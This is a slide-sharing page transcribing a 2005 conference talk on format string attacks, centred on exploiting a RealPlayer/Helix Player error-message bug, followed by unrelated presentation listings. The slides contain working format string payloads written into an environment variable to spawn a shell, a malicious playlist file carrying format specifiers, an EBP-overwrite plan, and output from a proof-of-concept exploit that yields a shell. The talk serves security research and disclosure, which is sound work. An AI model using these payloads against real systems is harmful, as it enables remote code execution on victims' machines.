owning realplayer just like they do in the movies
play

Owning RealPlayer, just like they do in the movies! Further - PowerPoint PPT Presentation

Feb 09, 2024 •101 likes •317 views

Owning RealPlayer, just like they do in the movies! Further advances in format string attacks to help us win the game c0ntex Pakcon 2005 Karachi Who I Am My name is c0ntex and I research computer security, exploitation techniques,

  1. Owning RealPlayer, just like they do in the movies! Further advances in format string attacks to help us win the game c0ntex Pakcon 2005 Karachi

  2. Who I Am • My name is c0ntex and I research computer security, exploitation techniques, reverse engineering methods and related technologies for fun. • I have been seriously interested in security for about 2 years although I have been messing around with UNIX, networks, coding and security stuff for about 5. • Basically I find bugs, exploit them and sometimes work with the vendors to fix their coding problem for free. • My humble website, which can be found at http://www.open-security.org contains some advisories, code and texts I have released. Open-security.org PakCon 2005 Karachi

  3. Today’s Talk • Introductory overview of what format string bugs are • How incorrect use of printf() can have you owned • Touch on slightly more esoteric format powers • RealPlayer && Helix Player in relation to format bugs • A live attack demonstration exploiting RealPlayer • Defend with protection mechanisms • Defeating those methods too • Do’s and don’ts Open-security.org PakCon 2005 Karachi

  4. Format String Bugs – Old News! • Related to the use of the formatted output functions: printf, fprintf, sprintf, snprintf, vprintf, vfprintf, vsprintf, • Lack of conversion specifier in the use of the function causes the problem. • These bugs have been around for a long time, they have been abused for a long time and they still exist today! • One of the more trivial type of bugs to find since they are so obvious and stand out like a sore thumb! Open-security.org PakCon 2005 Karachi

  5. How They Look - Good & Bad #include <stdio.h> #include <stdio.h> int main(void) int main(void) { { char *ptr = NULL; char *ptr = NULL; ptr = getenv("TERM"); ptr = getenv("TERM"); if(ptr) if(ptr) printf(“%s\n”, ptr); printf(ptr); return(EXIT_SUCCESS); return(EXIT_SUCCESS); } } Open-security.org PakCon 2005 Karachi

  6. Mmm, k. Don’t Look Serious! View process memory - dump passwords, configuration • Usually write anything at any location in memory • Modify GOT / PLT / DTORS entries, function pointers, etc • Execute very malicious code and own the remote user • Well documented, very stable and powerful attack vector • 99% of format string bugs WILL result in stable exploit • Open-security.org PakCon 2005 Karachi

  7. Hehe… It Is Serious! c0ntex@debauch:~/vuln/fmt$ ./fmt xterm c0ntex@debauch:~/vuln/fmt$ export TERM=AAAAAAAAAAA`perl -e 'print ".%p" x 85'` c0ntex@debauch:~/vuln/fmt$ ./fmt AAAAAAAAAAA.0xbffffbe4.0xbffffac8.0x4003a413.0x1.0xbffffaf4.0xbffffafc.(nil).(nil).0x4000aaa0.0x4000b5a0. 0x40015ff4.0x1.0x8048340.(nil).0x8048361.0x8048404.0x1.0xbffffaf4.0x8048450.0x80484c0.0x4000b5a0. 0xbffffaec.0x400167e4.0x1.0xbffffbc1.(nil).0xbffffbc8.0xbffffbcf.0xbffffbdf.0xbffffcef.0xbffffd10.0xbffffd1c. 0xbfffff51.0xbfffff67.0xbfffffa1.0xbfffffc3.0xbfffffcb.0xbfffffdd.0xbfffffec.(nil).0x10.0x7e9fbbf.0x6.0x1000.0x11. 0x64.0x3.0x8048034.0x4.0x20.0x5.0x7.0x7.0x40000000.0x8.(nil).0x9.0x8048340.0xb.0x3e8.0xc.0x3e8.0xd. 0x3e8.0xe.0x3e8.0xf.0xbffffbbc.(nil).(nil).(nil).(nil).(nil).(nil).0x36383669.0x742f2e00.0x747365.0x313d5a48. 0x53003030.0x4c4c4548.0x69622f3d.0x61622f6e.0x54006873.0x3d4d5245.0x41414141 c0ntex@debauch:~/vuln/fmt$ c0ntex@debauch:~/vuln/fmt$ export TERM=`printf "\x10\x97\x04\x08\x12\x97\x04\x08"` %.64573u%85\$hn%.50114u%86\$hn 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000 .... .... 00000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000 00000000000sh-3.00$ sh-3.00$ sh-3.00$ Open-security.org PakCon 2005 Karachi

  8. The Overlooked Power Of %x Dump addresses of the process address space from several • frames on the stack. The deeper we are in the code, the more addresses, the better! | Frame 5 | Frame 4 | Frame 3 | Frame 2 | Frame 1 | Frame 0 | printf(%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x) If remote process does not crash and conditions are right, • we could use format bugs to help defeat some of the common system hardening methods like Grsecurity, PAX and SELinux. Non executable stack Stack randomization Heap randomization Library randomization Open-security.org PakCon 2005 Karachi

  9. The Vulnerability Many males love to look at a girl in a g-string ;) OK, I love looking at my girl in a g-string! When I saw one in the Helix / RealPlayer code, I got very excited!!!! Why? Have a look below: ./vuln-dev/realplayer/player/common/gtk/hxgerror.cpp … if(pUserString != NULL) { /* Again, I hear that only smil will do this */ g_string_append_printf(message, " (%s)", pUserString); } err = g_error_new (HX_ERROR, code, message->str); g_string_free(message, TRUE); return err; Open-security.org PakCon 2005 Karachi

  10. Trivial & Very Dangerous! The code should be: if(pUserString != NULL) { /* Again, I hear that only smil will do this */ g_string_append_printf(message, " (%s)", pUserString); } err = g_error_new (HX_ERROR, code, %s, message->str); g_string_free(message, TRUE); return err; Open-security.org PakCon 2005 Karachi

  11. What Does This Mean? When RealPlayer encounters an error, it produces a message relating to the problem. If the file name was a few %x for instance, odd things seem to happen. By embedding malicious content in a play list file, the attacker has a trivial way to leverage remote control of the error function. <imfl> <head width = “1337" height = “1337" start = "0" duration = “1337" timeformat = "dd:hh:mm:ss.xyz" bitrate = "1337" url = "http://www.open-security.org"/> <image handle = "1" name=“ This is a format bug -> %p.%p.%p.%p.%p "/> <fill start = "0" color="blue"/> </imfl> Open-security.org PakCon 2005 Karachi

  12. It Means Trouble! It is possible to dump important process addresses, write to various locations in memory and crash the remote process. We are greedy and want more than that, right!?!? All playlist file information is malloc()’d and as such, stored on the heap. This means we cant directly access any supplied information passed in the .rp by performing %x %p popping through the stack frames. The heap causes us some troublesome problems: Attacker can’t perform multiple writes Attacker can’t write a full 4 byte address Attacker can’t write to any memory location Open-security.org PakCon 2005 Karachi

  13. Oh noes…. We’re RUMBLED! Open-security.org PakCon 2005 Karachi

  14. Or Are We? Sure, we can not supply the address of a GOT entry to hijack, nor can we modify the DTORS. If in the realpix file we write our shellcode or return-to-libc string, it’s placed on the heap which is all fine, but we have the problem of not being able to perform two writes. Since we can not supply where we write to, again we are up against the wall. So we need to think of another approach to win this game. What can be done: Attacker can perform at least 1 write Attacker can write 1 / 2 maybe 3 bytes Attacker can write to some important areas Open-security.org PakCon 2005 Karachi

  15. Lets See.. We need to target reachable addresses finding those that we can modify. If we can change the LSB (Least Significant Byte) of a register, we may be able to take control of the process. What can we target? What would you target? • Function pointers • Locations used in call & ret instructions • Direct registers, including EAX, EBX, EBP, ESP, EIP popN - call *0x04(eax) - eax is controlled popN+N - call *0x20(eax) - eax is controlled popN+NN - call *0x100(edx) - edx is controlled popN+NNN - ebp - ebp is controlled popN+NNNN - esp - esp is controlled Open-security.org PakCon 2005 Karachi

  16. >:-] Enough Now? After analysis, EBP and ESP become great targets! Why? Procedure epilogue! It consists of the following assembler: movl % %ebp ebp, % , %esp esp movl popl % popl %ebp ebp ret ret If we can control the value in EBP, we control EIP after the ret We CAN control the name of the file we want the victim to play The EVIL PLAN! 1 Create a file named `printf "\x37\x13\x12\x08"`.rp 2 Overwrite EBP MSB with the address of the file location on the stack 3 EBP is moved to ESP 4 EIP is changed to ESP value 5 EIP is owned, shell is spawned Open-security.org PakCon 2005 Karachi

  17. YES, Evil Elf Says 0wned! c0ntex@debauch:~$ ./helix4real Remote format string exploit POC for UNIX RealPlayer && HelixPlayer Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version by c0ntex || c0ntexb@gmail.com || http://www.open-security.org [-] Creating file [VY~Ò.rp] [-] Using [148] stack pops [-] Modifying EBP MSB with value [64105] [-] Completed creation of test file! [-] Executing RealPlayer now... [-] Connecting to shell in 10 seconds ** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW ** (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() whoami c0ntex Open-security.org PakCon 2005 Karachi

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

IS OWNING A CAT BETTER Elie J. Diner, PhD SlideTalk THAN OWNING A DOG? University of Cat

IS OWNING A CAT BETTER Elie J. Diner, PhD SlideTalk THAN OWNING A DOG? University of Cat

IS OWNING A CAT BETTER Elie J. Diner, PhD SlideTalk THAN OWNING A DOG? University of Cat HUMANS HAVE DOMESTICATED MANY DIFFERENT TYPES OF ANIMALS AS PETS Canis lupus Oryctolagus Felis catus Carassius familiaris cuniculus auratus PHOTO

158 views • 11 slides
The Sword &amp; Sorcery Movies of the 1980s The Sword &amp; Sorcery Movies of the 1980s - -

The Sword &amp; Sorcery Movies of the 1980s The Sword &amp; Sorcery Movies of the 1980s - -

So bad, theyre good The Sword &amp; Sorcery Movies of the 1980s The Sword &amp; Sorcery Movies of the 1980s - - Not covering other films like Kull the Conquerer because it was 1990s - Super cut of S &amp; S movies Poster Promises

655 views • 61 slides
Example: Age, Income and Owning a flat 250 Training set

Example: Age, Income and Owning a flat 250 Training set

Decision Tree Learning Debapriyo Majumdar Data Mining Fall 2014 Indian Statistical Institute Kolkata August 25, 2014 Example: Age, Income and Owning a flat 250 Training set (thousand

589 views • 14 slides
Funny movies for the All rights available, English and Russian whole family including OTT and

Funny movies for the All rights available, English and Russian whole family including OTT and

Funny movies for the All rights available, English and Russian whole family including OTT and SVOD ABOUT VIP COMEDY The best international comedies from the biggest studios Both contemporary and timeless movies with top comedy stars Loud,

147 views • 10 slides
Super 8 Languages for Making Movies (A Functional Pearl) Leif Andersen Stephen Chang Ma hias

Super 8 Languages for Making Movies (A Functional Pearl) Leif Andersen Stephen Chang Ma hias

Super 8 Languages for Making Movies (A Functional Pearl) Leif Andersen Stephen Chang Ma hias Felleisen PLT @ Northeastern University ICFP - Sept 4, 2017 Super 8 : Languages for Making Movies Super , 8 Languages for Making Movies Super 8 :

1.03k views • 86 slides
The owning house data Can we separate the points with a line? 200 Income

The owning house data Can we separate the points with a line? 200 Income

Linear Discriminant Analysis Debapriyo Majumdar Data Mining Fall 2014 Indian Statistical Institute Kolkata August 28, 2014 The owning house data Can we separate the points with a line? 200 Income (thousand

435 views • 14 slides
Music The Compact Disc replaced vinyl and cassettes Movies The DVD replaced VHS tapes Video

Music The Compact Disc replaced vinyl and cassettes Movies The DVD replaced VHS tapes Video

Music The Compact Disc replaced vinyl and cassettes Movies The DVD replaced VHS tapes Video Games Both CDs and DVDs have replaced cartridges High Definition Movies Blu-Ray replaced DVD Computers Both CDs and DVDs have floppy disks

287 views • 10 slides
Better than owning Freed up capital Business aims and benefjts to society OUR RENTING CONCEPT is

Better than owning Freed up capital Business aims and benefjts to society OUR RENTING CONCEPT is

Better than owning Freed up capital Business aims and benefjts to society OUR RENTING CONCEPT is crystal clear. Being able commercial goals and increase the return on to offer the client to sell and buy back the same equity by focusing on their

368 views • 7 slides
Learning Realis,c Human Ac,ons from Movies I. Laptev, M.

Learning Realis,c Human Ac,ons from Movies I. Laptev, M.

Learning Realis,c Human Ac,ons from Movies I. Laptev, M. Marszaek, C. Schmid and B. Rozenfeld. CVPR 2008. Presented by: Islam Beltagy Girish

607 views • 46 slides
The case for a registry owning a registrar in its TLD Richard Tindal, SVP Registry eNom/ Demand

The case for a registry owning a registrar in its TLD Richard Tindal, SVP Registry eNom/ Demand

The case for a registry owning a registrar in its TLD Richard Tindal, SVP Registry eNom/ Demand Media What this debate is about: To simplify terminology lets call registries producers and registrars retail stores Were debating

357 views • 18 slides
Canadian Movie Channels Investment Opportunity March 2012 MOVIES Executive Summary SPT

Canadian Movie Channels Investment Opportunity March 2012 MOVIES Executive Summary SPT

Canadian Movie Channels Investment Opportunity March 2012 MOVIES Executive Summary SPT Networks is acquiring a significant stake in two Canadian movie channels which will be rebranded Sony Movie Channel (SMC) and AXN Movies Hollywood

233 views • 11 slides
MISSION: To be the worlds most valued gold mining business by finding, developing, and owning

MISSION: To be the worlds most valued gold mining business by finding, developing, and owning

MISSION: To be the worlds most valued gold mining business by finding, developing, and owning the best assets, with the best people, to deliver sustainable returns for our owners and partners Cautionary Statement on Forward Looking

195 views • 16 slides
$ Lesson Six Cars and Loans 04/09 costs of owning and operating a motor vehicle ownership

$ Lesson Six Cars and Loans 04/09 costs of owning and operating a motor vehicle ownership

Presentation Slides $ Lesson Six Cars and Loans 04/09 costs of owning and operating a motor vehicle ownership (fixed) costs: Depreciation (based on purchase price) Interest on loan (if buying on credit) Insurance Registration

204 views • 16 slides
WINNING MESSAGES ON JUDGES, GUNS AND OWNING THE CONSTITUTIONS TEXT, HISTORY &amp; VALUES Mark

WINNING MESSAGES ON JUDGES, GUNS AND OWNING THE CONSTITUTIONS TEXT, HISTORY &amp; VALUES Mark

WINNING MESSAGES ON JUDGES, GUNS AND OWNING THE CONSTITUTIONS TEXT, HISTORY &amp; VALUES Mark Mellman mmellman@mellmangroup.com 1023 31st Street, NW 5th Floor Washington, DC 20007 ph 202-625-0370 fx 202-625-0371

774 views • 48 slides
I n the movies, scholarly work is a con- the floor to Prof. D, the designated dis- These are

I n the movies, scholarly work is a con- the floor to Prof. D, the designated dis- These are

THE PROFESSION Reforming the Conference Presentation, or What We Can Learn from Hollywood Charles King, Georgetown University I n the movies, scholarly work is a con- the floor to Prof. D, the designated dis- These are welcome steps in the

170 views • 3 slides
January 8, 2019 GE Warren Associates Why Are We Here? City of Pittsburg wants to consider owning

January 8, 2019 GE Warren Associates Why Are We Here? City of Pittsburg wants to consider owning

Electric Utility Feasibility Study Presentation to City Commission January 8, 2019 GE Warren Associates Why Are We Here? City of Pittsburg wants to consider owning and operating its own electric utility: To improve local competitive

206 views • 20 slides
Amber Enterprise India Limited Q4 FY2020 Earnings Conference Call June 01, 2020 M

Amber Enterprise India Limited Q4 FY2020 Earnings Conference Call June 01, 2020 M

Amber Enterprise India Limited Q4 FY2020 Earnings Conference Call June 01, 2020 M ANAGEMENT : M R . JASBIR SINGH - CHAIRMAN &amp; CEO - AMBER ENTERPRISES INDIA LIMITED MR. DALJIT SINGH - MD AMBER ENTERPRISES INDIA LIMITED MR. SUDHIR

442 views • 21 slides
Formability characterization of AISI202 Stainless Steel Submitted by Prahlad Kumar Tewari

Formability characterization of AISI202 Stainless Steel Submitted by Prahlad Kumar Tewari

Draft MTech Thesis Formability characterization of AISI202 Stainless Steel Submitted by Prahlad Kumar Tewari 2K13/PIE/26 Part-Time In partial fulfilment for the award of the degree of MASTER OF TECHNOLOGY in PRODUCTION ENGINEERING Submitted

1.04k views • 76 slides
Dhruv Singal GROUP 6 Pulp fiction, the magnum opus of Quentin Tarantino, is an absolute visual

Dhruv Singal GROUP 6 Pulp fiction, the magnum opus of Quentin Tarantino, is an absolute visual

Dhruv Singal GROUP 6 Pulp fiction, the magnum opus of Quentin Tarantino, is an absolute visual treat. Tarantino has used the art of non-linear story telling in a very effective manner. Backed up by some very powerful performances by the cast

388 views • 10 slides
Teaching Cultural Humility and Competence Lessons Learned from Developing and Teaching a

Teaching Cultural Humility and Competence Lessons Learned from Developing and Teaching a

Teaching Cultural Humility and Competence Lessons Learned from Developing and Teaching a Multi-Disciplinary Online Hybrid Course Elaine Yuen, PhD Nancy L. Chernett, MPH Susan Toth-Cohen, PhD, OTL/R Rob Simmons DrPH, MPH, CHES, CPH Thomas

553 views • 23 slides
MEET-THE-PARENTS PRIMARY 5 &amp; 6 30 JANUARY 2015 Healthy Eating in Schools Award SCHOOL

MEET-THE-PARENTS PRIMARY 5 &amp; 6 30 JANUARY 2015 Healthy Eating in Schools Award SCHOOL

MEET-THE-PARENTS PRIMARY 5 &amp; 6 30 JANUARY 2015 Healthy Eating in Schools Award SCHOOL LEADERS Mr Kenny Reyes Raphael Mdm Cassie Fan Yuen Fun Mdm Anna Tay Ngee Mui Vice-Principal Principal Vice-Principal (Staff Management) (Student

925 views • 69 slides
Sharemind - practical privacy- preserving analytics Sander Siim Cybernetica AS

Sharemind - practical privacy- preserving analytics Sander Siim Cybernetica AS

Sharemind - practical privacy- preserving analytics Sander Siim Cybernetica AS sander.siim@cyber.ee About Sharemind Sharemind uses MPC to analyse data that was not accessible before. Sharemind resolves trust issues by removing

938 views • 49 slides
2018 Ocean Salmon Regulations Exhibit E Chris Kern Fish Division April 20, 2018 BCWA N of

2018 Ocean Salmon Regulations Exhibit E Chris Kern Fish Division April 20, 2018 BCWA N of

2018 Ocean Salmon Regulations Exhibit E Chris Kern Fish Division April 20, 2018 BCWA N of Falcon WA Col. R . Area OR COC S of Falcon ORCA KMZ Slide 1 Sacramento Fall Chinook 3 yrs of significant over-forecasting. Escapement

314 views • 9 slides
Presentat ation on at at t the Museum of of C City &amp; &amp; S Sea i a in M May 20

Presentat ation on at at t the Museum of of C City &amp; &amp; S Sea i a in M May 20

Presentat ation on at at t the Museum of of C City &amp; &amp; S Sea i a in M May 20 2012 12 as as par art of of t the Deat ath &amp; D Diversity e exhibi bition. When arranging a funeral, there are few rules. Mak aking a f a

532 views • 6 slides

More recommend